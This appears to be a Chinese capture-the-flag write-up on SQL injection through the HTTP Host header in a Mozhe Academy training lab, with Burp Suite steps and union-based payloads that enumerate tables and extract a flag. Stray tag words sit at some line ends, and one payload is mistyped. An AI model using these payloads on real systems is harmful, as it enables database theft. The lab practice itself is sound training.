本週看了一些host頭注入的文章,如今來實際實驗一下。html
1.對比常見的Get、Post注入,http頭注入比較少見,web
可能的注入點大可能是下面三類:數據庫
Host:[host];學習
User-Agent:ui
Cookie:spa
host注入和平時進行的手工注入是同樣的,只不過位置是在Host頭處。基本命令也是同樣的,本次實驗就當對以前學習的手工注入進行復習了。3d
2.實驗環境:墨者學院在線靶場orm
目的:獲取flag。htm
3.開始實驗:blog
由於猜解的payload比較多,只列舉幾個吧。可參考https://www.freebuf.com/articles/web/120747.html
就當從新複習一下吧。
首先使用burpsuite抓包,會抓到一個Post和一個Get請求:
接着將Get請求發送到Reapeater中,先發送原數據包看看:
再修改host數據發送看看,
1>猜解SQL查詢語句中的字段數: order by 1#,沒有報錯
輸入order by 5#,返回一條錯誤語句,經實驗發現存在4個字段。
2>獲取當前數據庫:輸入union select 1,2,3database(),返回數據庫名
3>拿表:union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() #,發現存在四個表
根據前面的提示,猜想flag就是咱們要的表
4>拿flag,輸入union select 1,2,3,group_concat(flag) from flag
5.去前臺輸入key,